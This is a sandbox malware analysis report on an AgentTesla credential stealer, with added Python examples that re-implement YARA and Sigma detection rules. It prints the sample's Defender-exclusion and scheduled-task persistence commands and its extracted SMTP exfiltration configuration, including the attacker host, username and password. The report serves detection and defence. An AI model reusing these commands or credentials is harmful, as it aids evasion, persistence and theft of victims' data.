Windows Analysis Report
Swift_Copy.scr

Overview

General Information

Sample name: Swift_Copy.scr
Analysis ID: 1430207
MD5: a474ccda551682dcb92efe1402dd02cb
SHA1: 6a147a094a142d0ddf04c97b6b74626be611c189
SHA256: 1680d6ff15e6c5b4a4098b88073646bb4cff58b6c51a916bed32401b02a64a6b

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Swift_Copy.scr (PID: 4592 cmdline: "C:\Users\user\Desktop\Swift_Copy.scr" /S MD5: A474CCDA551682DCB92EFE1402DD02CB)
    • powershell.exe (PID: 4436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6588 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3628 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • WAuLmtFUmD.exe (PID: 5960 cmdline: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe MD5: A474CCDA551682DCB92EFE1402DD02CB)
    • schtasks.exe (PID: 2504 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 1276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.sigmamotorspk.com", "Username": "khiro@sigmamotorspk.com", "Password": "zarbeazab1234"}
Yara matches in memory dumps (Source | Rule | Description | Author):
0000000C.00000002.3276330521.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.2118653417.00000000028FE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000C.00000002.3276330521.0000000002E37000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(truncated; the full report lists 16 entries)
            SourceRuleDescriptionAuthorStrings
Yara matches in unpacked PEs (Source | Rule | Description | Author):
8.2.WAuLmtFUmD.exe.50a5450.11.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.WAuLmtFUmD.exe.50a5450.11.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
8.2.WAuLmtFUmD.exe.50a5450.11.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  Strings:
  • 0x316f3: $s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31765: $s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x317ef: $s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31881: $s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x318eb: $s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3195d: $s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x319f3: $s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31a83: $s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.WAuLmtFUmD.exe.506aa30.9.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.WAuLmtFUmD.exe.506aa30.9.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(truncated; the full report lists 22 entries)
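The eight strings above are the schema GUIDs of the Windows Credential Vault (the fourth and fifth are the "Web Credentials" and "Windows Credentials" vaults); a stealer carries them because it enumerates those vaults through vaultcli. The following is an added example, not Joe Sandbox's or ditekSHen's code: it re-implements the string part of a rule shaped like INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID in Python and runs it over a constructed buffer, to show why a rule against a .NET stealer needs `wide` (the CLR stores string literals as UTF-16LE) and `nocase`. The report does not print the rule body, so the condition used here (MZ magic plus a minimum number of distinct GUIDs) is an assumption.

```python
"""Added example (not Joe Sandbox's or ditekSHen's code): the string-matching part of a rule
shaped like INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, to show what YARA's `ascii wide nocase`
buys you against a .NET stealer, whose string literals sit in the image as UTF-16LE."""
import re

# The eight vault schema GUIDs listed as $s1..$s8 in the report's Yara hit.
VAULT_SCHEMA_GUIDS = [
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5",
    "3CCD5499-87A8-4B10-A215-608888DD3B55",
    "154E23D0-C644-4E6F-8CE6-5069272F999F",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28",   # the "Web Credentials" vault
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29",   # the "Windows Credentials" vault
    "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B",
    "3C886FF3-2669-4AA2-A8FB-3F6759A77548",
]


def _ascii_nocase(s: str) -> bytes:
    """Regex equivalent of YARA `ascii nocase` for one literal."""
    return b"(?i)" + re.escape(s.encode())


def _wide_nocase(s: str) -> bytes:
    """Regex equivalent of YARA `wide nocase`: each character followed by a NUL (UTF-16LE)."""
    out = b""
    for ch in s:
        if ch.isalpha():
            out += b"[" + ch.lower().encode() + ch.upper().encode() + b"]\x00"
        else:
            out += re.escape(ch.encode()) + b"\x00"
    return out


def scan(buf: bytes, min_strings: int = 1) -> dict:
    """Locate every GUID in either encoding and evaluate the rule condition.

    Condition assumed here (the report does not show the rule body): PE magic at offset 0
    plus at least `min_strings` distinct GUIDs, i.e. `uint16(0) == 0x5a4d and N of them`.
    """
    hits = {}
    for guid in VAULT_SCHEMA_GUIDS:
        found = [(m.start(), "ascii") for m in re.finditer(_ascii_nocase(guid), buf)]
        found += [(m.start(), "wide") for m in re.finditer(_wide_nocase(guid), buf)]
        if found:
            hits[guid] = sorted(found)
    is_pe = buf[:2] == b"MZ"
    return {"is_pe": is_pe, "hits": hits, "match": is_pe and len(hits) >= min_strings}


def build_sample() -> bytes:
    """Constructed stand-in for an unpacked .NET image (not the real sample): MZ stub, filler,
    one GUID stored as a UTF-16LE user string, one as lower-case ASCII."""
    buf = b"MZ" + b"\x90" * 0x100 + b"#US" + b"\x00" * 0x10
    buf += VAULT_SCHEMA_GUIDS[3].encode("utf-16le") + b"\x00\x00"      # wide, at offset 277
    buf += b"C:\\placeholder\\path\x00" * 4
    buf += VAULT_SCHEMA_GUIDS[4].lower().encode() + b"\x00"            # ascii, needs nocase
    return buf


if __name__ == "__main__":
    result = scan(build_sample())
    for guid, where in result["hits"].items():
        print(guid, where)
    print("rule match:", result["match"])
```

Without the `wide` variant the UTF-16LE GUID is invisible to an ASCII search, and without `nocase` the lower-case copy is missed; dropping the MZ header from the same buffer (as an unpacked memory blob that is not a PE image would) turns the condition off even though the strings are still there.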

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift_Copy.scr" /S, ParentImage: C:\Users\user\Desktop\Swift_Copy.scr, ParentProcessId: 4592, ParentProcessName: Swift_Copy.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", ProcessId: 4436, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe, ParentImage: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe, ParentProcessId: 5960, ParentProcessName: WAuLmtFUmD.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp", ProcessId: 2504, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 65.21.71.87, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5948, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49709
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift_Copy.scr" /S, ParentImage: C:\Users\user\Desktop\Swift_Copy.scr, ParentProcessId: 4592, ParentProcessName: Swift_Copy.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", ProcessId: 3628, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift_Copy.scr" /S, ParentImage: C:\Users\user\Desktop\Swift_Copy.scr, ParentProcessId: 4592, ParentProcessName: Swift_Copy.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe", ProcessId: 4436, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Swift_Copy.scr" /S, ParentImage: C:\Users\user\Desktop\Swift_Copy.scr, ParentProcessId: 4592, ParentProcessName: Swift_Copy.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp", ProcessId: 3628, ProcessName: schtasks.exe
No Snort rule has matched
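The Sigma hits above and the process tree describe the whole defence-evasion and persistence chain: the dropper spawns powershell.exe to add a Defender path exclusion for its copy in %APPDATA%, registers a scheduled task under Updates\ from an XML file in %TEMP%, and the hollowed RegSvcs.exe process opens TCP 587 to the SMTP exfil host. The following is an added example, not Joe Sandbox or Sigma project code: a Python reconstruction of that detection logic, written from the rule names and the event fields printed in this report (the exact Sigma conditions are not on the page, so each rule body here is an approximation), run over constructed process-creation and Sysmon EID 3 shaped records. The first two process records and the first network record copy the report's values; the encoded-command variant, the benign schtasks baseline, the Outlook baseline and the mail-client allow-list are assumptions.

```python
"""Added example, not Joe Sandbox or Sigma project code: detection logic reconstructed from the
Sigma hits in this report, run over constructed event records (process creation + Sysmon EID 3)."""
import base64

PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
DROPPER = r"C:\Users\user\Desktop\Swift_Copy.scr"
COPY = r"C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"


def encoded_command(script: str) -> str:
    """What `powershell -EncodedCommand` takes: base64 over the UTF-16LE script bytes."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Events 0 and 1 copy the report; 2 and 3 are constructed (an encoded variant and a benign baseline).
PROC_EVENTS = [
    {"Image": PS, "ParentImage": DROPPER,
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"'},
    {"Image": SCHTASKS, "ParentImage": COPY,
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp"'},
    {"Image": PS, "ParentImage": DROPPER,
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand "
                    + encoded_command(r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming"')},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Query /TN "Microsoft\Windows\Defrag\ScheduledDefrag"'},
]
# Network event 0 copies the report's Sysmon EID 3 hit; event 1 is a constructed mail-client baseline.
NET_EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "DestinationIp": "65.21.71.87", "DestinationPort": 587, "Initiated": True},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "DestinationIp": "198.51.100.25", "DestinationPort": 587, "Initiated": True},
]


def base64offset_variants(needle: bytes) -> list:
    """Sigma's `base64offset` modifier: the three base64 spellings of `needle` that are stable
    wherever it sits inside a larger encoded blob (edge characters that also depend on
    neighbouring bytes are trimmed)."""
    start, end = (0, 2, 3), (None, -3, -2)
    return [base64.b64encode(b" " * i + needle)[start[i]:end[(len(needle) + i) % 3]].decode()
            for i in range(3)]


def rule_defender_exclusion(ev) -> bool:
    """'Powershell Defender Exclusion': plaintext Add-/Set-MpPreference with an -Exclusion* switch."""
    cl = ev["CommandLine"].lower()
    return any(c in cl for c in ("add-mppreference ", "set-mppreference ")) and any(
        s in cl for s in (" -exclusionpath ", " -exclusionextension ", " -exclusionprocess ", " -exclusionipaddress "))


def rule_b64_mppreference(ev) -> bool:
    """'Powershell Base64 Encoded MpPreference Cmdlet': the cmdlet inside a base64 blob, whether the
    encoded script is ASCII or UTF-16LE (-EncodedCommand)."""
    needles = []
    for s in ("Add-MpPreference ", "Set-MpPreference "):
        needles += base64offset_variants(s.encode()) + base64offset_variants(s.encode("utf-16le"))
    return any(n in ev["CommandLine"] for n in needles)


USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\desktop\\", "\\downloads\\", "\\temp\\")


def rule_schtasks_from_user_dir(ev) -> bool:
    """'Scheduled temp file as task from temp location' / 'Suspicious Schtasks From Env Var Folder':
    schtasks /Create whose task XML or target lives in a user-writable folder."""
    cl = ev["CommandLine"].lower()
    return ev["Image"].lower().endswith("\\schtasks.exe") and "/create" in cl and any(
        p in cl for p in USER_WRITABLE + ("%temp%", "%appdata%", "%localappdata%"))


def rule_schtasks_suspicious_parent(ev) -> bool:
    """'Suspicious Add Scheduled Task Parent': schtasks /Create spawned by a binary in a user-writable folder."""
    return ev["Image"].lower().endswith("\\schtasks.exe") and "/create" in ev["CommandLine"].lower() and any(
        p in ev["ParentImage"].lower() for p in USER_WRITABLE)


MAIL_CLIENTS = ("\\outlook.exe", "\\thunderbird.exe")  # assumed allow-list; the real rule's list is longer


def rule_outbound_smtp(ev) -> bool:
    """'Suspicious Outbound SMTP Connections': SMTP/submission ports from anything but a mail client."""
    return bool(ev["Initiated"]) and ev["DestinationPort"] in (25, 465, 587, 2525) and not \
        ev["Image"].lower().endswith(MAIL_CLIENTS)


PROC_RULES = (rule_defender_exclusion, rule_b64_mppreference,
              rule_schtasks_from_user_dir, rule_schtasks_suspicious_parent)


def run(proc_events=PROC_EVENTS, net_events=NET_EVENTS) -> dict:
    """Map rule name -> indices of the events it fired on."""
    hits = {}
    for i, ev in enumerate(proc_events):
        for rule in PROC_RULES:
            if rule(ev):
                hits.setdefault(rule.__name__, []).append(i)
    for i, ev in enumerate(net_events):
        if rule_outbound_smtp(ev):
            hits.setdefault("rule_outbound_smtp", []).append(i)
    return hits


if __name__ == "__main__":
    for name, idx in run().items():
        print(f"{name}: events {idx}")
```

Two things worth noticing when running this. The plaintext exclusion rule does not fire on the constructed -EncodedCommand record while the base64offset rule does, which is why the two Sigma rules coexist; and the report's records carry a SysWOW64 image path although the command line names System32, because the 32-bit dropper runs under WOW64 and file-system redirection rewrites the path, so rules that match on Image should not assume System32.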


AV Detection

Source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.sigmamotorspk.com", "Username": "khiro@sigmamotorspk.com", "Password": "zarbeazab1234"}
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Virustotal: Detection: 45%
Source: Swift_Copy.scr | Virustotal: Detection: 45%
Source: Swift_Copy.scr | ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Joe Sandbox ML: detected
Source: Swift_Copy.scr | Joe Sandbox ML: detected
Source: Swift_Copy.scr | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Swift_Copy.scr | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 4x nop then jmp 0AB1151Fh (0_2_0AB10CB4)
Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | Code function: 4x nop then jmp 0EFF0C6Fh (8_2_0EFF03FD)
Source: global traffic | TCP traffic: 192.168.2.5:49709 -> 65.21.71.87:587
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: mail.sigmamotorspk.com
Source: Swift_Copy.scr, WAuLmtFUmD.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Swift_Copy.scr, WAuLmtFUmD.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: RegSvcs.exe, 00000007.00000002.2118653417.0000000002906000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3276330521.0000000002E56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.sigmamotorspk.com
Source: Swift_Copy.scr, WAuLmtFUmD.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: Swift_Copy.scr, 00000000.00000002.2106668901.00000000033F6000.00000004.00000800.00020000.00000000.sdmp, WAuLmtFUmD.exe, 00000008.00000002.2135864386.00000000035B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000007.00000002.2118653417.0000000002906000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3276330521.0000000002E56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sigmamotorspk.com
Source: Swift_Copy.scr, 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WAuLmtFUmD.exe, 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: Swift_Copy.scr, WAuLmtFUmD.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, NDL2m67zO.cs | .Net Code: tKj

System Summary

Source: 8.2.WAuLmtFUmD.exe.50a5450.11.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 8.2.WAuLmtFUmD.exe.506aa30.9.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.Swift_Copy.scr.44510c0.10.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.Swift_Copy.scr.44166a0.9.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.Swift_Copy.scr.44166a0.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 8.2.WAuLmtFUmD.exe.506aa30.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: Swift_Copy.scr, Program.cs | Large array initialization: array initializer size 623286
Source: 0.2.Swift_Copy.scr.5f50000.11.raw.unpack, HomeView.cs | Large array initialization: array initializer size 33604
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_018ED93C
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_0766D460
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_0766C4C8
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_0766C4B8
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_0766CE68
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_0766CE78
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_07661EC0
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_07661EAF
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_07663E98
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_0766ACC8
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_07667B90
Source: C:\Users\user\Desktop\Swift_Copy.scr | Code function: 0_2_0AB12BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00DF9378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00DF4A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00DF9BF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00DFCEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00DF3E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00DF41C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05DD56F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05DD0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05DDBD18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05DDDD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05DD8C04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05DD3F68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05DD2AF8
